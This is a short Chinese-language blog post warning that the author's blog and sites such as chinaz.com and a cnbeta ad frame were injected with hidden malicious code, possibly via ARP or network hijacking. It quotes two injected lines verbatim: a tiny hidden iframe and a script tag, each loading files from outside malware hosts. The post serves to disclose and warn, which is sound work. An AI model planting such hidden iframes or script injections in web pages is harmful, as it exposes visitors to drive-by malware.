本人在更换博客主题时发现本地效果与上传后的效果不一致,有错位现象,经多方查找,发现原来是页面顶端被人挂马了。
本人赶紧查找原因,甚至把整个站下载下来一一分析,没有找到代码中挂马的地方。
初步推断分析,一种原因可能是服务器被挂马,另外一种原因可能是运营商网络被挟持,联想到最近的路由器漏洞问题,这种可能性很大。
然后本人又发现若干较有影响的知名站点也被挂马。
如中国站长站:http://www.chinaz.com/
在首页点鼠标右键,查看网页源代码,会发现最顶部被嵌入一行代码:“<iframe src=http://sss.baiduweb8.com/arp.htm width=10 height=1></iframe>”
如cnbeta站,虽然主页面没有被挂马,但是有个广告框架页被挂马了:http://www.cnbeta.com/customad.htm
该框架页位于cnbeta主页面顶部,被嵌入了这样一行代码:“<script src=http:\/\/www.mnuiu.cn\/ar.js><\/script><title>Fuck Th3 W0rld!</title>”
还有其他若干站点也有类似遭遇,希望引起大家重视,查明原因。